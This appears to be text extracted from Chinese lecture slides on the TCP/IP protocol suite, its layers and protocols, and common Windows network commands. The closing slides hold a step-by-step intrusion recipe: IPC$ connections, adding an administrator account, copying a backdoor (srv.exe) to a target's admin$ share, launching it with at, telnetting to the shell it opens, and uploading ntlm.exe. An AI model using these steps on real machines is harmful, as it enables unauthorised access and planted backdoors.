tcpip协议

1TCP/IP协议2TCP/IP协议一、TCP/IP协议的基本概念TCP/IP协议是Internet中计算机之间进行网络通信所必须共同遵循的一种通信协议；是以传输控制协议（TransmissionControlProtocol）和网际协议（InternetProtocol）为核心的一组协议。二、TCP/IP参考模型的发展在TCP/IP协议研究时没有提出参考模型；1974年Kahn定义了最早的TCP/IP参考模型；1985年Leiner等对TCP/IP参考模型进一步的研究；目前我们使用的是版本4，一般被称为IPv4；IPv6被称为下一代的IP协议。3IP协议无连接数据报传送，数据报路由选择和差错控制。IP协议的数据报有报头和数据两部分组成。将数据报包装成符合物理网络要求的帧的格式的过程称为封装。不同物理网络对帧大小的限制是不同的，这种限制成为物理网络的最大传输单元（MTU）。目前的IP协议为IPv4和IPv6。4报头长度不固定，以32位为单位。数据报总长度占16位，包括报头和数据。报头为4字节的整数倍，不足40字节，用“0”来填充。路由选择给出一个从源到目标的IP地址序列，要求数据报严格沿制定的路由表传输。5TCP协议发送端的报文分成报文段并传给网络层，接收端把收到的报文段在组装成报文。还要处理流量控制，避免快速发送方向低速接收方发送过多的报文而是接收方无法接收。先通过计算校验和检验报文的正确，不正确则等待一段时间后重发。67可靠的数据传输特征：面向数据流，虚电路连接，带缓冲的传送，无结构的数据流，全双工连接。TCP提供了一个完全可靠的，面向连接的，全双工的流传输服务。采用带重发的肯定确认机制。解决同一帧发两次都收到的情况，必须对ACK编号，一般的编号方法是采用滑动窗口方法。TCP超时重发的自适应算法。P168三次握手目的：是在存在包丢失、重复和延时的情况下，确保通信双方的信息交换确定性的充分必要条件。CR：请求连接，ACC：接收连接请求，SEQ：信息序列号，DR：中止连接。91011UDP协议不需要TCP的排序和流量控制功能的应用。用于传递速度比准确性更重要的报文传输。12三、TCP/IP协议的特点开放的协议标准，可以免费使用，并且独立于特定的计算机硬件与操作系统，随着新的网络服务的不断出现，TCP/IP不断补充；独立于特定的网络硬件，可以运行在局域网、广域网，更适用于互连网中；适用于不同类型的计算机与网络之间的互联。采用统一的网络地址分配方案，使得整个TCP/IP设备在网中都具有唯一的地址；标准化的高层协议，提供多种可靠的用户服务。13四、TCP/IP的参考模型TCP/IP分为四个层次，分别是网络接口层、网际层、传输层和应用层。TCP/IP的层次结构与OSI层次结构的对照关系如下图所示：物理层数据链路层网络层传输层会话层表示层应用层网络接口层网际层传输层应用层OSI的参考模型TCP/IP的参考模型141.网络接口层又被称为网络访问层，包括了能使用TCP/IP与物理网络进行通信的协议，它对应OSI的物理层和数据链路层。TCP/IP标准并没有定义具体的网络接口协议，仅定义了如何与不同网络进行接口。TCP/IP参考模型的最低层，负责通过网络介质发送和接收TCP/IP数据包;允许主机连入网络时使用多种现成的与流行的协议，例如局域网的Ethernet、令牌网、分组交换网的X.25、帧中继、ATM协议等;充分体现出TCP/IP协议的兼容性与适应性，它也为TCP/IP的成功奠定了基础。152.网际层(网络互联层)网际层是在TCP/IP标准中正式定义的第一层。网际层所执行的主要功能：处理来自传输层的分组，将分组形成数据包（IP数据包），并为该数据包进行路径选择，最终将数据包从源主机发送到目的主机。处理接收的数据报：检查地址、处理或转发。处理互连的路径、流量控制、拥塞问题。在网际层中，最常用的协议是网际协议IP，其它一些协议用来协助IP的操作。16网际层的协议网际协议IP(InternetProtocol)IP协议的任务是对数据包进行相应的寻址和路由，并从一个网络转发到另一个网络。向上一层提供统一的IP数据报，屏蔽低层各物理数据帧的差异性。网际控制报文协议ICMP(InternetControlMessageProtocol)为IP协议提供差错报告。专门用来处理错误报告和控制。地址解析协议ARP(AddressResolutionProtocol)和反向地址解析协议RARP173.传输层传输层也被称为主机至主机层，主要负责主机到主机之间实体间端对到端通信，解决下层没有处理的通信问题。传输控制协议TCP(TransmissionControlProtocol)是传输层一种面向连接的通信协议，提供可靠的数据传送。完成流量控制和差错检验的任务，保证可靠的数据传输。用户数据报协议UDP(UserDatagramProtocol)UDP协议是一种面向无连接的协议，它不能提供可靠的数据传输。UDP不进行差错检验，必须由应用层的应用程序实现可靠性机制和差错控制，以保证端到端数据传输的正确性。184.应用层包含多有的高层协议，为应用程序提供访问其它层服务的能力，定义应用程序用于交换数据的协议，为用户提供所需的各种服务。在TCP/IP模型中，应用程序接口是最高层，它与OSI模型中的高三层的任务相同，用于提供网络服务，比如文件传输、远程登录、域名服务和简单网络管理等。19应用层协议（一）超文本传输协议HTTP用于Internet中的客户机与服务器之间的数据传输；文件传输协议FTP实现主机之间的文件传送；远程终端协议TELNET本地主机作为仿真终端，登录到远程主机上运行应用程序；简单邮件传输协议SMTP实现主机之间电子邮件的传送；域名服务DNS用于实现主机名与IP地址之间的映射；20应用层协议（二）路由信息协议RIP用于网络设备之间交换路由信息；动态主机配置协议DHCP实现对主机的地址分配和配置工作。网络文件系统NFS实现主机之间的文件系统的共享；引导协议BOOTP用于无盘主机或工作站的启动简单网络管理协议SNMP实现网络的管理；21五、TCP/IP协议集传输层应用层TCPUDPSMTPFTPDNSSNMPNFSHTTPTEL-NET网络接口层LANMANWAN网际层IPICMPIGMPARPRARP22网络中常用的命令三大网络调试命令：1.最基本，最常用的，测试物理网络的ping192.168.0.8ping127.0.0.1ping192.168.0.8－t，参数－t是等待用户去中断测试ping-a192.168.0.8参数－a是显示计算机名ping-n5000192.168.0.8参数－n是发送指定多少数据包ping–l6550–t192.168.0.8参数－L定义数据包的大小2.pingip/hostname/dns/gateway233.Tracert（域名）Tracertip（IP地址）2.查看DNS、IP、Mac等A.Win98：winipcfgB.Win2000以上：Ipconfig/all(ipconfig/releaseoripconfig/renew)C.NSLOOKUP：如查看州的DNS(nslookupipornslookupdomain)24网络中常用的命令4.探测对方对方计算机名，所在的组、域及当前用户名（追捕的工作原理）ping－aIP－t，只显示NetBios名nbtstat-a192.168.10.146比较全的5.netstat-a显示出你的计算机当前所开放的所有端口netstat-s-e比较详细的显示你的网络资料，包括TCP、UDP、ICMP和IP的统计等Nenstat–an显示计算机端口的详细信息6.探测arp绑定（动态和静态）列表，显示所有连接了我的计算机，显示对方IP和MAC地址arp-a捆绑IP和MAC地址，解决局域网内盗用IP！：ARP－s192.168.10.5900－50－ff－6c－08－75解除网卡的IP与MAC地址的绑定：arp-d网卡IP25网络中常用的命令8.在网络邻居上隐藏你的计算机（让人家看不见你！）netconfigserver/hidden:yesnetconfigserver/hidden:no则为开启9.路由跟踪命令A.tracertpop.pcpop.comB.pathpingpop.pcpop.com除了显示路由外，还提供325S的分析，计算丢失包的％26网络中常用的命令10.几个net命令A.显示当前工作组服务器列表netview，当不带选项使用本命令时，它就会显示当前域或网络上的计算机上的列表。比如：查看这个IP上的共享资源，就可以netview\\IPaddressusee:\\ip\lqNetuserabcabc/addNetuserabcabcdNetlocalgroupadministratorsabc/addNetuserguest/active:yesNetuserabc/delNetshareNetshared:/delc:\netsharemymovie=e:\downloads\movie/users:1D.记录链接netsessionC:\netsession计算机用户名客户类型打开空闲时间-------------------------------------------------------------------------------\\192.168.10.110ROMEWindows20002195000:03:12\\192.168.10.51ROMEWindows20002195000:00:3927网络中常用的命令1)建立空连接:netuse\\IP\ipc$/user:(一定要注意:这一行命令中包含了3个空格)2)建立非空连接:netuse\\IP\ipc$用户名/user:密码(同样有3个空格)3)映射默认共享:netusez:\\IP\c$“密码”/user:“用户名”(即可将对方的c盘映射为自己的z盘，其他盘类推)如果已经和目标建立了ipc$，则可以直接用IP+盘符+$访问,具体命令netusez:\\IP\c$4)删除一个ipc$连接netuse\\IP\ipc$/del5)删除共享映射netusec:/del删除映射的c盘，其他盘类推netuse*/del删除全部,会有提示要求按y确认2）C:\copysrv.exe\\127.0.0.1\admin$先复制srv.exe上去，在流光的Tools目录下就有（这里的$是指admin用户的c:\winnt\system32\，大家还可以使用c$、d$，意思是C盘与D盘，这看你要复制到什么地方去了）。3.C:\nettime\\127.0.0.1查查时间，发现127.0.0.1的当前时间是2002/3/19上午11:00，命令成功完成。4.C:\at\\127.0.0.111:05srv.exe用at命令启动srv.exe吧（这里设置的时间要比主机时间快，不然你怎么启动啊，呵呵！）5.C:\nettime\\127.0.0.1再查查到时间没有？如果127.0.0.1的当前时间是2002/3/19上午11:05，那就准备开始下面的命令。6.C:\telnet127.0.0.199这里会用到Telnet命令吧，注意端口是99。Telnet默认的是23端口，但是我们使用的是SRV在对方计算机中为我们建立一个99端口的Shell。7.C:\copyntlm.exe\\127.0.0.1\admin$用Copy命令把ntlm.exe上传到主机上（ntlm.exe也是在《流光》的Tools目录中）。8.C:\WINNT\system32ntlm28网络